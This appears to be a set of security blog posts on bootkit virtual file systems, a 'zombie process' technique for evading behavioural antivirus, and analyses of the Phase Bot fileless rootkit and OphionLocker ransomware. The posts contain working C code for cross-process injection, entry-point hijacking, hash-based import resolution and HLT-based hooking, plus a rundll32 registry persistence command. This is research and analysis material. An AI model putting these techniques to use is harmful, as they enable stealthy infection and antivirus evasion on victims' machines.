It's quite common for a VFS driver to send requests directly to the lowest level disk driver (the disk miniport); as a result the disk read/write requests cannot be intercepted by the antivirus or any standard disk monitors, providing better stealth. Although you could write standard files using this method, ntfs.sys handles the NTFS specification, so you'd have to create your own NTFS driver, which would be a lot of work, especially as NTFS is not fully documented by Microsoft. 

The actual format of the VFS is entirely dependent on the developer, some have chosen to use FAT32 with RC4 encryption, whilst others use custom file systems with modified encryption algorithms. Almost always the VFS is encrypted in an attempt to make the data look like random leftover bytes and not executables or log files.

Bootkits most commonly use a VFS because it reduces the attack surface to a single point of attack: the infected bootloader reads the rootkit driver from the VFS and loads it into the kernel long before the antivirus, giving the kernel driver time to install hooks and cover its tracks before the OS even initializes. A bootkit using a VFS driver has only one weakness: the infected boot record. This can be easily resolved by using the bootkit's driver to hook the disk miniport and spoof read/write requests to the boot sector, tricking the AV into thinking the boot sector contains the original Windows boot code; the same method can also be used to simply return empty sectors if something other than the rootkit tries to read the VFS.

Zombie Processes as a HIPS Bypass

A long, long time ago (about 10 years in non-internet time) malware developers only had to worry about signature based detection, which could be easily bypassed with polymorphic droppers or executable encryption. To deal with rapidly evolving malware capable of evading signature detection, HIPS was created.

HIPS (Host-based Intrusion Prevention System), sometimes referred to as Proactive Protection or Proactive Defense, is an anti-malware technique designed to detect malware by its behavior, not its file signature. Using kernel mode callbacks and hooking, HIPS systems can monitor which functions an executable calls, with which parameters, and in what order. By monitoring these calls the HIPS can get a decent idea of what the executable is trying to do; for example, allocating executable memory in a foreign process, followed by creating a thread that resides in the allocated memory, means the process is likely trying to inject code. Once the executable tries to perform an action that is deemed malicious, the system can decide what to do based on how common the application is, whether it's signed, and by whom. For a malicious executable to escape a HIPS, it would have to trick the system into believing it's a legitimate signed application.

Due to non-static data within a process, such as absolute addresses, imports, and statically allocated variables, it is not possible to verify the digital signature of a running process. To check a process' signature, the HIPS has to get the executable's file path from the PEB (Process Environment Block) or the section handle, then verify the signature of the file on disk.

Zombie Processes

The concept of zombie processes is pretty simple: we create a standard Windows process in a suspended state, then write our malicious code into the process' memory; the PEB and EPROCESS structures will still be those of the original process, causing the HIPS to see the now-malicious process as a legitimate signed executable (this is not RunPE or dynamic forking, because we don't unmap the original executable and replace it with our malicious one, as that can be detected in multiple ways). It's basically PE injection, but with less exposure to functions that would allow the HIPS to detect code injection. 
  • CreateProcess returns a handle to the created process and its main thread with full access, so we don't have to call OpenProcess or OpenThread.
  • The main thread is in a suspended state and we know the entry point, so no need to call CreateRemoteThread.
  • Modification to a child process is far less suspicious than modification to a foreign one.

Injecting the Code
A common practice is to call VirtualAllocEx to allocate memory, then use the returned address to relocate the code ready to run at that address. Once the code has been prepared, it can be written to the process with WriteProcessMemory. This is a terrible idea; every HIPS ever expects malware to do that. A better practice used by newer malware (such as Andromeda and BetaBot) is to create a section, then use NtMapViewOfSection to map the section into both the current process and the target process. It's not really possible to know what address the section will be mapped at before mapping it, so this would cause a problem with code that requires relocation.

NtMapViewOfSection actually maps the same physical section into both processes (writing to the view of the section in the current process also writes to the view in the target process), so we can simply map the section into both processes, then relocate and write the code to the section in the current process, resulting in it also being written to the target process. No WriteProcessMemory needed!
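A stripped-down sketch of the mapping step is shown below; it's not the code from my ZombifyProcess example, just an illustration of the NtCreateSection / NtMapViewOfSection pattern using the usual undocumented ntdll prototypes (error handling mostly omitted).

#include <windows.h>

typedef NTSTATUS (NTAPI *pNtCreateSection)(PHANDLE, ACCESS_MASK, PVOID,
    PLARGE_INTEGER, ULONG, ULONG, HANDLE);
typedef NTSTATUS (NTAPI *pNtMapViewOfSection)(HANDLE, HANDLE, PVOID *, ULONG_PTR,
    SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG);

// Map a shared RWX section into the current process and a (suspended) target
// process; writing to localView also writes to remoteView.
BOOL MapSharedSection(HANDLE hTargetProcess, SIZE_T size,
                      PVOID *localView, PVOID *remoteView)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    pNtCreateSection NtCreateSection_ =
        (pNtCreateSection)GetProcAddress(ntdll, "NtCreateSection");
    pNtMapViewOfSection NtMapViewOfSection_ =
        (pNtMapViewOfSection)GetProcAddress(ntdll, "NtMapViewOfSection");

    HANDLE hSection = NULL;
    LARGE_INTEGER maxSize;
    maxSize.QuadPart = size;

    // Create a pagefile-backed section large enough for the payload.
    if (NtCreateSection_(&hSection, SECTION_ALL_ACCESS, NULL, &maxSize,
                         PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL) != 0)
        return FALSE;

    SIZE_T viewSize = 0;
    *localView = NULL;
    *remoteView = NULL;

    // Map the section into our own process (2 == ViewUnmap).
    NtMapViewOfSection_(hSection, GetCurrentProcess(), localView, 0, 0, NULL,
                        &viewSize, 2, 0, PAGE_EXECUTE_READWRITE);

    // Map the same physical section into the target process.
    viewSize = 0;
    NtMapViewOfSection_(hSection, hTargetProcess, remoteView, 0, 0, NULL,
                        &viewSize, 2, 0, PAGE_EXECUTE_READWRITE);

    return *localView != NULL && *remoteView != NULL;
}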

Executing the Code
There are a few ways to do this, but I'll go over the two most common (see the sketch after this list).
  • Use SetThreadContext to change the EAX register (which points to the process entry point) to the entry point of your code.
  • Use WriteProcessMemory to write a jump from the process entry point to your code.
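Here's a rough sketch of the first option (32-bit), assuming the process was created suspended and the payload has already been mapped at payloadEntry; it illustrates the technique rather than reproducing the GitHub example.

#include <windows.h>

// Point the suspended main thread's EAX (the entry point the Windows loader
// will eventually call) at our payload, then let the process run. 32-bit only.
BOOL HijackEntryPoint(PROCESS_INFORMATION *pi, DWORD payloadEntry)
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_INTEGER;        // we only need the integer registers

    if (!GetThreadContext(pi->hThread, &ctx))
        return FALSE;

    ctx.Eax = payloadEntry;                    // EAX holds the entry point at this stage

    if (!SetThreadContext(pi->hThread, &ctx))
        return FALSE;

    return ResumeThread(pi->hThread) != (DWORD)-1;
}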

Conclusion

Once the code is running inside the trusted process, it is likely to have far more freedom in what it can do without triggering antivirus warnings, since the PEB, EPROCESS, and section handle all still point to the original process.

As always I've included some example code: https://github.com/MalwareTech/ZombifyProcess

Like magic!








Phase Bot - A Fileless Rootkit (Part 1)

Phase Bot is a fileless rootkit that went on sale in late October. The bot is fairly cheap ($200) and boasts features such as formgrabbing, FTP stealing, and of course the ability to run without a file. The bot comes as both a 32-bit binary (Win32/Phase) and a 64-bit binary (Win64/Phase), despite the fact that both binaries operate in exactly the same way.



The first thing you notice when opening it up in IDA is that the AddressOfEntryPoint is 0. This may seem like an error, but it actually isn't: setting the entry point to 0 means the start of the DOS header is used as the entry point, which is possible because most of the fields following the MZ signature aren't required, and the M (0x4D) and Z (0x5A) bytes are valid instructions (dec ebp and pop edx respectively). I'm not sure of the actual purpose of this trick, but it's interesting nonetheless.

Cancels out the MZ instructions then jumps to real entry point.

The real entry point is contained within the first 560 bytes of the only section in the executable; this code is designed to retrieve data stored within the non-essential NT header fields and use it to RC4 decrypt the rest of the section, which contains the 2nd stage (shellcode).



Most initialization happens in what appears to be the world's longest function; the executable doesn't have an import table, so functions are resolved by hash. All the initialized data, such as offsets, strings, and function addresses, is stored within a large structure which is passed to all functions.
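Resolving imports by hash is a standard shellcode trick: instead of storing API names, the code walks a module's export table and hashes each exported name until one matches. A generic sketch follows; the hash function here is a simple placeholder, not the algorithm Phase actually uses.

#include <windows.h>

// Placeholder hash; the real malware uses its own algorithm.
static DWORD HashName(const char *name)
{
    DWORD hash = 0;
    while (*name)
        hash = (hash >> 13 | hash << 19) + (BYTE)*name++;
    return hash;
}

// Walk a module's export directory and return the address of the export
// whose hashed name matches 'targetHash'.
FARPROC ResolveByHash(HMODULE module, DWORD targetHash)
{
    BYTE *base = (BYTE *)module;
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)base;
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + dos->e_lfanew);
    DWORD exportRva =
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *)(base + exportRva);

    DWORD *names = (DWORD *)(base + exp->AddressOfNames);
    WORD *ordinals = (WORD *)(base + exp->AddressOfNameOrdinals);
    DWORD *functions = (DWORD *)(base + exp->AddressOfFunctions);

    for (DWORD i = 0; i < exp->NumberOfNames; i++)
    {
        const char *name = (const char *)(base + names[i]);
        if (HashName(name) == targetHash)
            return (FARPROC)(base + functions[ordinals[i]]);
    }
    return NULL;
}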

but does anyone truly know what loops are?

Once initialization is done, the bot checks that PowerShell and version 2 of the .NET framework are installed: if they are, normal installation continues; if not, it writes the bot code to a file in the startup folder.

The malware first creates the registry key "hkcu\software\microsoft\active setup\installed components\{<GUID_STRING>}", then RC4 encrypts the 2nd stage's shellcode with the key "Phase" and writes it under the subkey "Rc4Encoded32"; afterwards the 64-bit shellcode is extracted and written to the "Rc4Encoded64" subkey, also encrypted with "Phase" as the key. A 3rd subkey named "JavaScript" is created, which contains some JavaScript code.
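A rough sketch of that installation step, using the documented registry APIs; the GUID below is just a placeholder, and the shellcode is assumed to have already been RC4 encrypted.

#include <windows.h>
#pragma comment(lib, "advapi32.lib")

// Store the (already RC4-encrypted) 32-bit shellcode under the Active Setup
// key, roughly as described above. The GUID here is a placeholder.
BOOL StoreStage2(const BYTE *encryptedShellcode, DWORD size)
{
    HKEY hKey;
    LONG err = RegCreateKeyExA(HKEY_CURRENT_USER,
        "Software\\Microsoft\\Active Setup\\Installed Components\\"
        "{00000000-0000-0000-0000-000000000000}",
        0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL);
    if (err != ERROR_SUCCESS)
        return FALSE;

    // The bot encrypts the shellcode with RC4 (key "Phase") before writing it.
    err = RegSetValueExA(hKey, "Rc4Encoded32", 0, REG_BINARY,
                         encryptedShellcode, size);
    RegCloseKey(hKey);
    return err == ERROR_SUCCESS;
}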



The full JavaScript is a bit long to post here, so I've uploaded it to pastebin. It simply base64 decodes a PowerShell script designed to read and decrypt the shellcode from the Rc4Encoded subkey, then runs it; you can find the decoded PowerShell script here (the comments were left in by the author).

For the bot to start with the system, a subkey named "Windows Host Process (RunDll)" is created under "hkcu\software\microsoft\windows\currentVersion\run", with the following value:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}\\JavaScript"));close();
This is a trick used by Win32/Poweliks to get rundll32 to run the code from the JavaScript subkey, which then base64 decodes the PowerShell script and runs it with PowerShell.exe; you can read more about this trick here.



The final stage, which runs from within PowerShell, hooks the following functions by overwriting their first instruction with 0xF4 (HLT).

  • ntdll!NtResumeThread (Inject new processes)
  • ntdll!NtReadVirtualMemory (Hide malware's memory)
  • ntdll!NtQueryDirectoryFile (Hide file, only used if the fileless installation failed)
  • ws2_32!send (Data stealer)
  • wininet!HttpSendRequest (Internet Explorer formgrabber)
  • nss3!PR_Write (Firefox formgrabber)

The HLT instruction is a privileged instruction which cannot be executed from ring 3; as a result it generates a 0xC0000096 (Privileged Instruction) exception, which the bot catches and handles using a vectored exception handler. This is the same idea as standard software breakpoint hooking, but using a privileged instruction instead of int 3.
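For illustration, here is a minimal sketch of that style of hook: the first byte of a target function is replaced with HLT, and a vectored exception handler catches the resulting privileged-instruction exception and redirects execution. The handler below is 32-bit (it patches Eip) and greatly simplified compared to the real bot.

#include <windows.h>

static PVOID g_hookedFunc;     // address we patched with HLT
static PVOID g_detourFunc;     // where execution should be redirected

// Catch the privileged-instruction exception raised by HLT and redirect
// execution to the detour (32-bit: patch Eip).
LONG CALLBACK VehHandler(PEXCEPTION_POINTERS info)
{
    if (info->ExceptionRecord->ExceptionCode == EXCEPTION_PRIV_INSTRUCTION &&
        info->ExceptionRecord->ExceptionAddress == g_hookedFunc)
    {
        info->ContextRecord->Eip = (DWORD)g_detourFunc;
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

// Overwrite the first byte of 'target' with HLT (0xF4) and register the handler.
BOOL InstallHltHook(PVOID target, PVOID detour)
{
    DWORD oldProtect;
    g_hookedFunc = target;
    g_detourFunc = detour;

    if (!AddVectoredExceptionHandler(1, VehHandler))
        return FALSE;

    if (!VirtualProtect(target, 1, PAGE_EXECUTE_READWRITE, &oldProtect))
        return FALSE;
    *(BYTE *)target = 0xF4;                   // HLT
    VirtualProtect(target, 1, oldProtect, &oldProtect);
    return TRUE;
}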



As you can imagine, the executable shows all sorts of malicious signs.

NULL AddressOfEntryPoint, missing all data directories, invalid section name.

It should be noted that some of the advertised features appear to be missing, and the comments in the PowerShell code suggest that this sample is an early/testing version. I'll update if I can get hold of a newer version. 

Phase Bot - A Fileless Rootkit (Part 2)

As I said in the last part of the analysis, the sample I had was just a test binary, but now I have some real ones thanks to some help from @Xylit0l. The new binaries incorporate some much more interesting features, which I'll go over in this article.

Reverse Connection

Although Phase is not a banking Trojan (it only supports standard form grabbing), it does have some banking Trojan features such as reverse RDP and reverse SOCKS. The idea behind this is that the RDP or SOCKS daemon on the infected machine connects to the client (the bot master or command and control server), as opposed to the other way round, allowing infected machines behind NAT/firewalls to still be used as servers. 

Interestingly, the RDP interface is built into the C&C panel and only allows basic mouse / keyboard input; as you'd expect, this is very slow and incredibly demanding on the HTTP server.

Embedded Reverse RDP

Module Loader

The module loader allows the bot's functionality to be extended via paid or 3rd party modules. These modules are uploaded to the panel ready to be installed by the bot, which supports storing modules on disk or in a registry key (registry-stored modules are manually loaded into memory and executed by the bot, thus bypassing anti-virus scanners).

Options specifying how the bot should handle the module.

Modules

The modules themselves are 32-bit or 64-bit DLLs (depending on the system architecture); they're downloaded from the panel and stored in an RC4-encrypted format either on the disk or in the registry. Even with RC4 encryption, they are very easy to identify and dump due to a static encryption key and format. 
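Because the key is static, dumping a module only requires a plain RC4 pass over the stored blob. Below is a generic RC4 routine for that purpose; the actual key used for the modules isn't reproduced here, so the key argument is a placeholder.

#include <stddef.h>

// Plain RC4: the same routine encrypts and decrypts. Useful for dumping the
// registry/disk-stored modules once the static key is known.
void rc4(const unsigned char *key, size_t keyLen, unsigned char *data, size_t dataLen)
{
    unsigned char S[256];
    unsigned char i = 0, j = 0, tmp;
    size_t k;

    for (k = 0; k < 256; k++)
        S[k] = (unsigned char)k;

    // Key-scheduling algorithm (KSA).
    for (k = 0, j = 0; k < 256; k++)
    {
        j = (unsigned char)(j + S[k] + key[k % keyLen]);
        tmp = S[k]; S[k] = S[j]; S[j] = tmp;
    }

    // Pseudo-random generation algorithm (PRGA).
    for (k = 0, i = 0, j = 0; k < dataLen; k++)
    {
        i = (unsigned char)(i + 1);
        j = (unsigned char)(j + S[i]);
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        data[k] ^= S[(unsigned char)(S[i] + S[j])];
    }
}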


In the wild we've only found 3 modules (all of which are made by the same developer as Phase).
  • vnc32 - reverse VNC daemon (32-bit).
  • vnc64 - reverse VNC daemon (64-bit).
  • scan32 - Point of Sales Track1/Track2 stealer (32-bit).

As of writing this, both the encrypted and decrypted versions of each module have absolutely no detections on VirusTotal:


MD5: 5767b9bf9cb6f2b5259f29dd8b873e36
SHA1: 6cb74b4e309d80efbe674d3d48376ee1f7e2edda
SHA256: 3a9f8f9dc215be8bc8d278ab99f5e6bdac2d1732d4a3b536d55696dfe766491a

MD5: 1fa781b2ece5dfa36d51704c81e61e19
SHA1: d379bf330153c1bf742f59013ea6636e02ff28b4
SHA256: e1988a1876263837ca18b58d69028c3678dc3df51baf1721535df3204481e6a1

MD5: 94eefdce643a084f95dd4c91289c3cf0
SHA1: 0bbd15c31782a23b1252544221c564866975ea7e
SHA256: c33f2fdd945d053991e178fa12ab9ffea18f751313a8888c74004cbd680bbd75

MD5: d7da422a3d23de95a9c3c969a31430e9
SHA1: 32bcf2adafc5b189c04619c7c484d77a21861aba
SHA256: f88d5320b3882108f50d3c234313fe604956c0fc057c75b85cdfc3b8e6e9bfd1


OphionLocker: Proof Anyone Really Can Write Malware

OphionLocker is supposedly the new ransomware on the block and is already being compared with sophisticated operations such as CryptoLocker and CryptoWall, so I decided to take a look, and what I found is nothing short of hilarious.


That's right, the ransomware is actually a console application. Instead of writing a Win32 application, the developer has opted for a console application, which implies he is either writing command line tools (he's not), or that he has absolutely no damn idea what he's doing.

If there is even a shadow of a doubt as to whether this was written by a competent C++ developer, this should set the record straight:

H:\\ConsoleApplication1\\Release\\ConsoleApplication1.pdb

That's the PDB path of this application: "ConsoleApplicationX" is the name Visual Studio chooses automatically when creating a new C++ console project, and ConsoleApplication1 implies this is the first Visual Studio project created; either the developer has just moved from another development environment, or, more likely, he's never coded C++ before.


This is a hack to make the console window invisible; as a result the console window will open and then disappear a second later when the application is run.
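I can't show the sample's exact code here, but a common way to pull off this kind of hack is to hide the console window after the process has already started, which would produce exactly the flicker described above; a sketch, assuming that's the trick used:

#include <windows.h>

int main(void)
{
    // Hide the console window after startup; it still flashes briefly
    // because the window is created before this code runs.
    HWND console = GetConsoleWindow();
    if (console != NULL)
        ShowWindow(console, SW_HIDE);

    // ... ransomware logic would go here ...
    return 0;
}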



If you're new to programming, writing your own cryptographic library is obviously quite a challenge; as you can see, he's opted to just use Crypto++.

"But MalwareTech, even using a public cryptographic library, he'd need to know how to implement it."

Well, if we look through the strings in the application, we find the following: "ecies.private.key", which is the name of the file the application uses to store the private key; this is consistent with the example ECIES (Elliptic Curve Integrated Encryption Scheme) code on the Crypto++ wiki.
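For reference, the Crypto++ wiki's ECIES sample boils down to something like the snippet below (paraphrased from memory, so treat it as approximate rather than a copy of either the wiki or the malware).

#include "eccrypto.h"
#include "osrng.h"
#include "oids.h"
#include "files.h"
#include "filters.h"
#include <string>
using namespace CryptoPP;

int main()
{
    AutoSeededRandomPool prng;

    // Generate an ECIES key pair over a NIST curve.
    ECIES<ECP>::Decryptor decryptor(prng, ASN1::secp256r1());
    ECIES<ECP>::Encryptor encryptor(decryptor);

    // Save the private key to a file, as the malware appears to do.
    FileSink keyFile("ecies.private.key", true);
    decryptor.GetPrivateKey().Save(keyFile);

    // Encrypt a message with the public half.
    std::string plaintext = "victim file contents", ciphertext;
    StringSource ss(plaintext, true,
        new PK_EncryptorFilter(prng, encryptor,
            new StringSink(ciphertext)));
    return 0;
}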



The C&C communication mechanism is much the same story: although it could have been implemented with a few lines of code using the WinInet library, the developer has opted to use the insanely bulky HTTP client library WinHTTPClient, which uses the WinHTTP API (intended for services, not client applications).



Obviously, no application is complete without some error handling, so here's what happens if the locker fails to connect to the C&C.

Error handling is love, error handling is life.


GUI programming tends to be quite tricky, but it's nothing you can't achieve with a message box and 300 text files that all say the same thing.
This is why we can't have nice things.

Conclusion

Q: Can you code functional ransomware with absolutely no programming experience whatsoever?
A: Yes.



OphionLocker
MD5: e17da8702b71dfb0ee94dbc9e22eed8d
SHA1: eb78b7079fabecbec01a23c006227246e78126ab
SHA256: c1a0173d2300cae92c06b1a8cb344cabe99cf4db56fa9dca93629101c59ce68f